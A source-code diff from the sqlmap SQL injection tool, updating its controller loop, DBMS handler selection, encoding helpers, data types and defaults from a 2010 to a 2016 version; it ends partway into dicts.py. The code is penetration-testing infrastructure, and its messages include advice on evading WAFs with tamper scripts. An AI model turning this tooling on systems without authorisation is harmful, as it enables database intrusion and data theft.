+                                logger.info(infoMsg)
+
+                                injection = checkSqlInjection(place, parameter, value)
+                                proceed = not kb.endDetection
+
+                                if injection is not None and injection.place is not None:
+                                    kb.injections.append(injection)
+
+                                    # In case when user wants to end detection phase (Ctrl+C)
+                                    if not proceed:
+                                        break
+
+                                    msg = "%s parameter '%s' " % (injection.place, injection.parameter)
+                                    msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
+                                    test = readInput(msg, default="N")
+
+                                    if test[0] not in ("y", "Y"):
+                                        proceed = False
+                                        paramKey = (conf.hostname, conf.path, None, None)
+                                        kb.testedParams.add(paramKey)
+                                else:
+                                    warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
                                     warnMsg += "injectable"
                                     logger.warn(warnMsg)
 
-        if not kb.injPlace or not kb.injParameter or not kb.injType:
-            if len(injData) == 1:
-                injDataSelected = injData[0]
-
-            elif len(injData) > 1:
-                injDataSelected = __selectInjection(injData)
-
-            elif conf.multipleTargets:
-                continue
+                            finally:
+                                if place == PLACE.COOKIE:
+                                    kb.mergeCookies = popValue()
 
+            if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):
+                if kb.vainRun and not conf.multipleTargets:
+                    errMsg = "no parameter(s) found for testing in the provided data "
+                    errMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')"
+                    raise SqlmapNoneDataException(errMsg)
                 else:
-                return
+                    errMsg = "all tested parameters appear to be not injectable."
 
-            if injDataSelected == "Quit":
-                return
+                    if conf.level < 5 or conf.risk < 3:
+                        errMsg += " Try to increase '--level'/'--risk' values "
+                        errMsg += "to perform more tests."
 
+                    if isinstance(conf.tech, list) and len(conf.tech) < 5:
+                        errMsg += " Rerun without providing the option '--technique'."
+
+                    if not conf.textOnly and kb.originalPage:
+                        percent = (100.0 * len(getFilteredPageContent(kb.originalPage)) / len(kb.originalPage))
+
+                        if kb.dynamicMarkings:
+                            errMsg += " You can give it a go with the switch '--text-only' "
+                            errMsg += "if the target page has a low percentage "
+                            errMsg += "of textual content (~%.2f%% of " % percent
+                            errMsg += "page content is text)."
+                        elif percent < LOW_TEXT_PERCENT and not kb.errorIsNone:
+                            errMsg += " Please retry with the switch '--text-only' "
+                            errMsg += "(along with --technique=BU) as this case "
+                            errMsg += "looks like a perfect candidate "
+                            errMsg += "(low textual content along with inability "
+                            errMsg += "of comparison engine to detect at least "
+                            errMsg += "one dynamic parameter)."
+
+                    if kb.heuristicTest == HEURISTIC_TEST.POSITIVE:
+                        errMsg += " As heuristic test turned out positive you are "
+                        errMsg += "strongly advised to continue on with the tests. "
+                        errMsg += "Please, consider usage of tampering scripts as "
+                        errMsg += "your target might filter the queries."
+
+                    if not conf.string and not conf.notString and not conf.regexp:
+                        errMsg += " Also, you can try to rerun by providing "
+                        errMsg += "either a valid value for option '--string' "
+                        errMsg += "(or '--regexp')"
+                    elif conf.string:
+                        errMsg += " Also, you can try to rerun by providing a "
+                        errMsg += "valid value for option '--string' as perhaps the string you "
+                        errMsg += "have chosen does not match "
+                        errMsg += "exclusively True responses"
+                    elif conf.regexp:
+                        errMsg += " Also, you can try to rerun by providing a "
+                        errMsg += "valid value for option '--regexp' as perhaps the regular "
+                        errMsg += "expression that you have chosen "
+                        errMsg += "does not match exclusively True responses"
+
+                    if not conf.tamper:
+                        errMsg += " If you suspect that there is some kind of protection mechanism "
+                        errMsg += "involved (e.g. WAF) maybe you could retry "
+                        errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')"
+
+                    raise SqlmapNotVulnerableException(errMsg)
             else:
-                kb.injPlace, kb.injParameter, kb.injType = injDataSelected
-                setInjection()
+                # Flush the flag
+                kb.testMode = False
 
-        if not conf.multipleTargets and ( not kb.injPlace or not kb.injParameter or not kb.injType ):
-            raise sqlmapNotVulnerableException, "all parameters are not injectable"
-        elif kb.injPlace and kb.injParameter and kb.injType:
+                _saveToResultsFile()
+                _saveToHashDB()
+                _showInjections()
+                _selectInjection()
+
+            if kb.injection.place is not None and kb.injection.parameter is not None:
                 if conf.multipleTargets:
                     message = "do you want to exploit this SQL injection? [Y/n] "
                     exploit = readInput(message, default="Y")
@@ -255,8 +622,56 @@ def start():
                     condition = True
 
                 if condition:
-                checkForParenthesis()
                     action()
 
-    if conf.loggedToOut:
-        logger.info("Fetched data logged to text files under '%s'" % conf.outputPath)
+        except KeyboardInterrupt:
+            if conf.multipleTargets:
+                warnMsg = "user aborted in multiple target mode"
+                logger.warn(warnMsg)
+
+                message = "do you want to skip to the next target in list? [Y/n/q]"
+                test = readInput(message, default="Y")
+
+                if not test or test[0] in ("y", "Y"):
+                    pass
+                elif test[0] in ("n", "N"):
+                    return False
+                elif test[0] in ("q", "Q"):
+                    raise SqlmapUserQuitException
+            else:
+                raise
+
+        except SqlmapUserQuitException:
+            raise
+
+        except SqlmapSilentQuitException:
+            raise
+
+        except SqlmapBaseException, ex:
+            errMsg = getSafeExString(ex)
+
+            if conf.multipleTargets:
+                errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL")
+                logger.error(errMsg)
+            else:
+                logger.critical(errMsg)
+                return False
+
+        finally:
+            showHttpErrorCodes()
+
+            if kb.maxConnectionsFlag:
+                warnMsg = "it appears that the target "
+                warnMsg += "has a maximum connections "
+                warnMsg += "constraint"
+                logger.warn(warnMsg)
+
+    if kb.dataOutputFlag and not conf.multipleTargets:
+        logger.info("fetched data logged to text files under '%s'" % conf.outputPath)
+
+    if conf.multipleTargets and conf.resultsFilename:
+        infoMsg = "you can find results of scanning in multiple targets "
+        infoMsg += "mode inside the CSV file '%s'" % conf.resultsFilename
+        logger.info(infoMsg)
+
+    return True

lib/controller/handler.py

@@ -1,39 +1,50 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
-
-Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
-
-sqlmap is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 2 of the License.
-
-sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with sqlmap; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
 """
 
+from lib.core.common import Backend
 from lib.core.data import conf
-from lib.core.data import kb
 from lib.core.data import logger
+from lib.core.dicts import DBMS_DICT
+from lib.core.enums import DBMS
 from lib.core.settings import MSSQL_ALIASES
 from lib.core.settings import MYSQL_ALIASES
 from lib.core.settings import ORACLE_ALIASES
 from lib.core.settings import PGSQL_ALIASES
+from lib.core.settings import SQLITE_ALIASES
+from lib.core.settings import ACCESS_ALIASES
+from lib.core.settings import FIREBIRD_ALIASES
+from lib.core.settings import MAXDB_ALIASES
+from lib.core.settings import SYBASE_ALIASES
+from lib.core.settings import DB2_ALIASES
+from lib.core.settings import HSQLDB_ALIASES
+from lib.utils.sqlalchemy import SQLAlchemy
 
 from plugins.dbms.mssqlserver import MSSQLServerMap
+from plugins.dbms.mssqlserver.connector import Connector as MSSQLServerConn
 from plugins.dbms.mysql import MySQLMap
+from plugins.dbms.mysql.connector import Connector as MySQLConn
 from plugins.dbms.oracle import OracleMap
+from plugins.dbms.oracle.connector import Connector as OracleConn
 from plugins.dbms.postgresql import PostgreSQLMap
+from plugins.dbms.postgresql.connector import Connector as PostgreSQLConn
+from plugins.dbms.sqlite import SQLiteMap
+from plugins.dbms.sqlite.connector import Connector as SQLiteConn
+from plugins.dbms.access import AccessMap
+from plugins.dbms.access.connector import Connector as AccessConn
+from plugins.dbms.firebird import FirebirdMap
+from plugins.dbms.firebird.connector import Connector as FirebirdConn
+from plugins.dbms.maxdb import MaxDBMap
+from plugins.dbms.maxdb.connector import Connector as MaxDBConn
+from plugins.dbms.sybase import SybaseMap
+from plugins.dbms.sybase.connector import Connector as SybaseConn
+from plugins.dbms.db2 import DB2Map
+from plugins.dbms.db2.connector import Connector as DB2Conn
+from plugins.dbms.hsqldb import HSQLDBMap
+from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn
 
 def setHandler():
     """
@@ -41,30 +52,60 @@ def setHandler():
     management system.
     """
 
-    count     = 0
-    dbmsNames = ( "MySQL", "Oracle", "PostgreSQL", "Microsoft SQL Server" )
-    dbmsMap   = (
-                  ( MYSQL_ALIASES, MySQLMap ),
-                  ( ORACLE_ALIASES, OracleMap ),
-                  ( PGSQL_ALIASES, PostgreSQLMap ),
-                  ( MSSQL_ALIASES, MSSQLServerMap ),
-                )
+    items = [
+                  (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
+                  (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
+                  (DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
+                  (DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
+                  (DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
+                  (DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
+                  (DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
+                  (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
+                  (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
+                  (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
+                  (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
+            ]
 
-    for dbmsAliases, dbmsEntry in dbmsMap:
-        if conf.dbms and conf.dbms not in dbmsAliases:
-            debugMsg  = "skipping test for %s" % dbmsNames[count]
+    _ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)
+    if _:
+        items.remove(_)
+        items.insert(0, _)
+
+    for dbms, aliases, Handler, Connector in items:
+        if conf.dbms and conf.dbms.lower() != dbms and conf.dbms.lower() not in aliases:
+            debugMsg = "skipping test for %s" % dbms
             logger.debug(debugMsg)
-
-            count += 1
-
             continue
 
-        dbmsHandler = dbmsEntry()
+        handler = Handler()
+        conf.dbmsConnector = Connector()
 
-        if dbmsHandler.checkDbms():
-            if not conf.dbms or conf.dbms in dbmsAliases:
-                kb.dbmsDetected = True
+        if conf.direct:
+            logger.debug("forcing timeout to 10 seconds")
+            conf.timeout = 10
 
-                return dbmsHandler
+            dialect = DBMS_DICT[dbms][3]
 
-    return None
+            if dialect:
+                sqlalchemy = SQLAlchemy(dialect=dialect)
+                sqlalchemy.connect()
+
+                if sqlalchemy.connector:
+                    conf.dbmsConnector = sqlalchemy
+                else:
+                    try:
+                        conf.dbmsConnector.connect()
+                    except NameError:
+                        pass
+            else:
+                conf.dbmsConnector.connect()
+
+        if handler.checkDbms():
+            conf.dbmsHandler = handler
+            break
+        else:
+            conf.dbmsConnector = None
+
+    # At this point back-end DBMS is correctly fingerprinted, no need
+    # to enforce it anymore
+    Backend.flushForcedDbms()

lib/core/__init__.py

@@ -1,25 +1,8 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
-
-Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
-
-sqlmap is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 2 of the License.
-
-sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with sqlmap; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
 """
 
 pass

lib/core/bigarray.py

@@ -0,0 +1,167 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+try:
+   import cPickle as pickle
+except:
+   import pickle
+
+import itertools
+import os
+import sys
+import tempfile
+
+from lib.core.exception import SqlmapSystemException
+from lib.core.settings import BIGARRAY_CHUNK_SIZE
+
+DEFAULT_SIZE_OF = sys.getsizeof(object())
+
+def _size_of(object_):
+    """
+    Returns total size of a given object_ (in bytes)
+    """
+
+    retval = sys.getsizeof(object_, DEFAULT_SIZE_OF)
+    if isinstance(object_, dict):
+        retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object_.items()))
+    elif hasattr(object_, "__iter__"):
+        retval += sum(_size_of(_) for _ in object_)
+    return retval
+
+class Cache(object):
+    """
+    Auxiliary class used for storing cached chunks
+    """
+
+    def __init__(self, index, data, dirty):
+        self.index = index
+        self.data = data
+        self.dirty = dirty
+
+class BigArray(list):
+    """
+    List-like class used for storing large amounts of data (disk cached)
+    """
+
+    def __init__(self):
+        self.chunks = [[]]
+        self.chunk_length = sys.maxint
+        self.cache = None
+        self.filenames = set()
+        self._os_remove = os.remove
+        self._size_counter = 0
+
+    def append(self, value):
+        self.chunks[-1].append(value)
+        if self.chunk_length == sys.maxint:
+            self._size_counter += _size_of(value)
+            if self._size_counter >= BIGARRAY_CHUNK_SIZE:
+                self.chunk_length = len(self.chunks[-1])
+                self._size_counter = None
+        if len(self.chunks[-1]) >= self.chunk_length:
+            filename = self._dump(self.chunks[-1])
+            self.chunks[-1] = filename
+            self.chunks.append([])
+
+    def extend(self, value):
+        for _ in value:
+            self.append(_)
+
+    def pop(self):
+        if len(self.chunks[-1]) < 1:
+            self.chunks.pop()
+            try:
+                with open(self.chunks[-1], "rb") as fp:
+                    self.chunks[-1] = pickle.load(fp)
+            except IOError, ex:
+                errMsg = "exception occurred while retrieving data "
+                errMsg += "from a temporary file ('%s')" % ex.message
+                raise SqlmapSystemException, errMsg
+        return self.chunks[-1].pop()
+
+    def index(self, value):
+        for index in xrange(len(self)):
+            if self[index] == value:
+                return index
+        return ValueError, "%s is not in list" % value
+
+    def _dump(self, chunk):
+        try:
+            handle, filename = tempfile.mkstemp()
+            self.filenames.add(filename)
+            os.close(handle)
+            with open(filename, "w+b") as fp:
+                pickle.dump(chunk, fp, pickle.HIGHEST_PROTOCOL)
+            return filename
+        except (OSError, IOError), ex:
+            errMsg = "exception occurred while storing data "
+            errMsg += "to a temporary file ('%s'). Please " % ex.message
+            errMsg += "make sure that there is enough disk space left. If problem persists, "
+            errMsg += "try to set environment variable 'TEMP' to a location "
+            errMsg += "writeable by the current user"
+            raise SqlmapSystemException, errMsg
+
+    def _checkcache(self, index):
+        if (self.cache and self.cache.index != index and self.cache.dirty):
+            filename = self._dump(self.cache.data)
+            self.chunks[self.cache.index] = filename
+        if not (self.cache and self.cache.index == index):
+            try:
+                with open(self.chunks[index], "rb") as fp:
+                    self.cache = Cache(index, pickle.load(fp), False)
+            except IOError, ex:
+                errMsg = "exception occurred while retrieving data "
+                errMsg += "from a temporary file ('%s')" % ex.message
+                raise SqlmapSystemException, errMsg
+
+    def __getstate__(self):
+        return self.chunks, self.filenames
+
+    def __setstate__(self, state):
+        self.__init__()
+        self.chunks, self.filenames = state
+
+    def __getslice__(self, i, j):
+        retval = BigArray()
+        i = max(0, len(self) + i if i < 0 else i)
+        j = min(len(self), len(self) + j if j < 0 else j)
+        for _ in xrange(i, j):
+            retval.append(self[_])
+        return retval
+
+    def __getitem__(self, y):
+        if y < 0:
+            y += len(self)
+        index = y / self.chunk_length
+        offset = y % self.chunk_length
+        chunk = self.chunks[index]
+        if isinstance(chunk, list):
+            return chunk[offset]
+        else:
+            self._checkcache(index)
+            return self.cache.data[offset]
+
+    def __setitem__(self, y, value):
+        index = y / self.chunk_length
+        offset = y % self.chunk_length
+        chunk = self.chunks[index]
+        if isinstance(chunk, list):
+            chunk[offset] = value
+        else:
+            self._checkcache(index)
+            self.cache.data[offset] = value
+            self.cache.dirty = True
+
+    def __repr__(self):
+        return "%s%s" % ("..." if len(self.chunks) > 1 else "", self.chunks[-1].__repr__())
+
+    def __iter__(self):
+        for i in xrange(len(self)):
+            yield self[i]
+
+    def __len__(self):
+        return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1])

lib/core/convert.py

@@ -1,90 +1,220 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
-
-Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
-
-sqlmap is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 2 of the License.
-
-sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with sqlmap; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
 """
 
-try:
-    import hashlib
-except:
-    import md5
-    import sha
-    
+import base64
+import json
+import pickle
+import re
+import StringIO
 import sys
-import struct
-import urllib
+import types
 
-def base64decode(string):
-    return string.decode("base64")
+from lib.core.settings import IS_WIN
+from lib.core.settings import UNICODE_ENCODING
+from lib.core.settings import PICKLE_REDUCE_WHITELIST
 
-def base64encode(string):
-    return string.encode("base64")[:-1]
+def base64decode(value):
+    """
+    Decodes string value from Base64 to plain format
 
-def hexdecode(string):
-    string = string.lower()
+    >>> base64decode('Zm9vYmFy')
+    'foobar'
+    """
 
-    if string.startswith("0x"):
-        string = string[2:]
+    return base64.b64decode(value)
 
-    return string.decode("hex")
+def base64encode(value):
+    """
+    Encodes string value from plain to Base64 format
 
-def hexencode(string):
-    return string.encode("hex")
+    >>> base64encode('foobar')
+    'Zm9vYmFy'
+    """
 
-def md5hash(string):
-    if sys.modules.has_key('hashlib'):
-        return hashlib.md5(string).hexdigest()
+    return base64.b64encode(value)
+
+def base64pickle(value):
+    """
+    Serializes (with pickle) and encodes to Base64 format supplied (binary) value
+
+    >>> base64pickle('foobar')
+    'gAJVBmZvb2JhcnEALg=='
+    """
+
+    retVal = None
+
+    try:
+        retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
+    except:
+        warnMsg = "problem occurred while serializing "
+        warnMsg += "instance of a type '%s'" % type(value)
+        singleTimeWarnMessage(warnMsg)
+
+        try:
+            retVal = base64encode(pickle.dumps(value))
+        except:
+            retVal = base64encode(pickle.dumps(str(value), pickle.HIGHEST_PROTOCOL))
+
+    return retVal
+
+def base64unpickle(value):
+    """
+    Decodes value from Base64 to plain format and deserializes (with pickle) its content
+
+    >>> base64unpickle('gAJVBmZvb2JhcnEALg==')
+    'foobar'
+    """
+
+    retVal = None
+
+    def _(self):
+        if len(self.stack) > 1:
+            func = self.stack[-2]
+            if func not in PICKLE_REDUCE_WHITELIST:
+                raise Exception, "abusing reduce() is bad, Mkay!"
+        self.load_reduce()
+
+    def loads(str):
+        file = StringIO.StringIO(str)
+        unpickler = pickle.Unpickler(file)
+        unpickler.dispatch[pickle.REDUCE] = _
+        return unpickler.load()
+
+    try:
+        retVal = loads(base64decode(value))
+    except TypeError: 
+        retVal = loads(base64decode(bytes(value)))
+
+    return retVal
+
+def hexdecode(value):
+    """
+    Decodes string value from hex to plain format
+
+    >>> hexdecode('666f6f626172')
+    'foobar'
+    """
+
+    value = value.lower()
+    return (value[2:] if value.startswith("0x") else value).decode("hex")
+
+def hexencode(value):
+    """
+    Encodes string value from plain to hex format
+
+    >>> hexencode('foobar')
+    '666f6f626172'
+    """
+
+    return utf8encode(value).encode("hex")
+
+def unicodeencode(value, encoding=None):
+    """
+    Returns 8-bit string representation of the supplied unicode value
+
+    >>> unicodeencode(u'foobar')
+    'foobar'
+    """
+
+    retVal = value
+    if isinstance(value, unicode):
+        try:
+            retVal = value.encode(encoding or UNICODE_ENCODING)
+        except UnicodeEncodeError:
+            retVal = value.encode(UNICODE_ENCODING, "replace")
+    return retVal
+
+def utf8encode(value):
+    """
+    Returns 8-bit string representation of the supplied UTF-8 value
+
+    >>> utf8encode(u'foobar')
+    'foobar'
+    """
+
+    return unicodeencode(value, "utf-8")
+
+def utf8decode(value):
+    """
+    Returns UTF-8 representation of the supplied 8-bit string representation
+
+    >>> utf8decode('foobar')
+    u'foobar'
+    """
+
+    return value.decode("utf-8")
+
+def htmlunescape(value):
+    """
+    Returns (basic conversion) HTML unescaped value
+
+    >>> htmlunescape('a&lt;b')
+    'a<b'
+    """
+
+    retVal = value
+    if value and isinstance(value, basestring):
+        codes = (('&lt;', '<'), ('&gt;', '>'), ('&quot;', '"'), ('&nbsp;', ' '), ('&amp;', '&'))
+        retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal)
+        try:
+            retVal = re.sub(r"&#x([^;]+);", lambda match: unichr(int(match.group(1), 16)), retVal)
+        except ValueError:
+            pass
+    return retVal
+
+def singleTimeWarnMessage(message):  # Cross-linked function
+    sys.stdout.write(message)
+    sys.stdout.write("\n")
+    sys.stdout.flush()
+
+def stdoutencode(data):
+    retVal = None
+
+    try:
+        data = data or ""
+
+        # Reference: http://bugs.python.org/issue1602
+        if IS_WIN:
+            output = data.encode(sys.stdout.encoding, "replace")
+
+            if '?' in output and '?' not in data:
+                warnMsg = "cannot properly display Unicode characters "
+                warnMsg += "inside Windows OS command prompt "
+                warnMsg += "(http://bugs.python.org/issue1602). All "
+                warnMsg += "unhandled occurances will result in "
+                warnMsg += "replacement with '?' character. Please, find "
+                warnMsg += "proper character representation inside "
+                warnMsg += "corresponding output files. "
+                singleTimeWarnMessage(warnMsg)
+
+            retVal = output
         else:
-        return md5.new(string).hexdigest()
+            retVal = data.encode(sys.stdout.encoding)
+    except:
+        retVal = data.encode(UNICODE_ENCODING) if isinstance(data, unicode) else data
 
-def orddecode(string):
-    packedString = struct.pack("!"+"I" * len(string), *string)
-    return "".join([chr(char) for char in struct.unpack("!"+"I"*(len(packedString)/4), packedString)])
+    return retVal
 
-def ordencode(string):
-    return tuple([ord(char) for char in string])
+def jsonize(data):
+    """
+    Returns JSON serialized data
 
-def sha1hash(string):
-    if sys.modules.has_key('hashlib'):
-        return hashlib.sha1(string).hexdigest()
-    else:
-        return sha.new(string).hexdigest()
+    >>> jsonize({'foo':'bar'})
+    '{\\n    "foo": "bar"\\n}'
+    """
 
-def urldecode(string):
-    result = None
+    return json.dumps(data, sort_keys=False, indent=4)
 
-    if string:
-        result = urllib.unquote_plus(string)
+def dejsonize(data):
+    """
+    Returns JSON deserialized data
 
-    return result
+    >>> dejsonize('{\\n    "foo": "bar"\\n}')
+    {u'foo': u'bar'}
+    """
 
-def urlencode(string, safe=":/?%&=", convall=False):
-    result = None
-
-    if string is None:
-        return result
-
-    if convall:
-        result = urllib.quote(string)
-    else:
-        result = urllib.quote(string, safe)
-
-    return result
+    return json.loads(data)

lib/core/data.py

@@ -1,43 +1,28 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
-
-Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
-
-sqlmap is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 2 of the License.
-
-sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with sqlmap; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
 """
 
-from lib.core.datatype import advancedDict
-from lib.core.settings import LOGGER
+from lib.core.datatype import AttribDict
+from lib.core.log import LOGGER
 
 # sqlmap paths
-paths = advancedDict()
+paths = AttribDict()
+
+# object to store original command line options
+cmdLineOptions = AttribDict()
+
+# object to store merged options (command line, configuration file and default options)
+mergedOptions = AttribDict()
 
 # object to share within function and classes command
 # line options and settings
-conf = advancedDict()
+conf = AttribDict()
 
 # object to share within function and classes results
-kb = advancedDict()
-
-# object to share within function and classes temporary data,
-# just for internal use
-temp = advancedDict()
+kb = AttribDict()
 
 # object with each database management system specific queries
 queries = {}

lib/core/datatype.py

@@ -1,33 +1,24 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
-
-Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
-
-sqlmap is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 2 of the License.
-
-sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with sqlmap; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
 """
 
-from lib.core.exception import sqlmapDataException
+import copy
+import types
 
-class advancedDict(dict):
+from lib.core.exception import SqlmapDataException
+
+class AttribDict(dict):
     """
     This class defines the sqlmap object, inheriting from Python data
     type dictionary.
+
+    >>> foo = AttribDict()
+    >>> foo.bar = 1
+    >>> foo.bar
+    1
     """
 
     def __init__(self, indict=None, attribute=None):
@@ -52,7 +43,7 @@ class advancedDict(dict):
         try:
             return self.__getitem__(item)
         except KeyError:
-            raise sqlmapDataException, "Unable to access item '%s'" % item
+            raise SqlmapDataException("unable to access item '%s'" % item)
 
     def __setattr__(self, item, value):
         """
@@ -61,13 +52,56 @@ class advancedDict(dict):
         """
 
         # This test allows attributes to be set in the __init__ method
-        if not self.__dict__.has_key('_advancedDict__initialised'):
+        if "_AttribDict__initialised" not in self.__dict__:
             return dict.__setattr__(self, item, value)
 
         # Any normal attributes are handled normally
-        elif self.__dict__.has_key(item):
+        elif item in self.__dict__:
             dict.__setattr__(self, item, value)
 
         else:
             self.__setitem__(item, value)
 
+    def __getstate__(self):
+        return self.__dict__
+
+    def __setstate__(self, dict):
+        self.__dict__ = dict
+
+    def __deepcopy__(self, memo):
+        retVal = self.__class__()
+        memo[id(self)] = retVal
+
+        for attr in dir(self):
+            if not attr.startswith('_'):
+                value = getattr(self, attr)
+                if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
+                    setattr(retVal, attr, copy.deepcopy(value, memo))
+
+        for key, value in self.items():
+            retVal.__setitem__(key, copy.deepcopy(value, memo))
+
+        return retVal
+
+class InjectionDict(AttribDict):
+    def __init__(self):
+        AttribDict.__init__(self)
+
+        self.place = None
+        self.parameter = None
+        self.ptype = None
+        self.prefix = None
+        self.suffix = None
+        self.clause = None
+
+        # data is a dict with various stype, each which is a dict with
+        # all the information specific for that stype
+        self.data = AttribDict()
+
+        # conf is a dict which stores current snapshot of important
+        # options used during detection
+        self.conf = AttribDict()
+
+        self.dbms = None
+        self.dbms_version = None
+        self.os = None

lib/core/decorators.py

@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+def cachedmethod(f, cache={}):
+    """
+    Method with a cached content
+
+    Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/
+    """
+
+    def _(*args, **kwargs):
+        try:
+            key = (f, tuple(args), frozenset(kwargs.items()))
+        except:
+            key = "".join(str(_) for _ in (f, args, kwargs))
+        if key not in cache:
+            cache[key] = f(*args, **kwargs)
+        return cache[key]
+
+    return _

lib/core/defaults.py

@@ -0,0 +1,28 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.datatype import AttribDict
+
+_defaults = {
+   "csvDel":       ",",
+   "timeSec":      5,
+   "googlePage":   1,
+   "cpuThrottle":  5,
+   "verbose":      1,
+   "delay":        0,
+   "timeout":      30,
+   "retries":      3,
+   "saFreq":       0,
+   "threads":      1,
+   "level":        1,
+   "risk":         1,
+   "dumpFormat":   "CSV",
+   "tech":         "BEUSTQ",
+   "torType":      "HTTP",
+}
+
+defaults = AttribDict(_defaults)

lib/core/dicts.py

@@ -0,0 +1,239 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import DBMS
+from lib.core.enums import OS
+from lib.core.enums import POST_HINT
+from lib.core.settings import BLANK
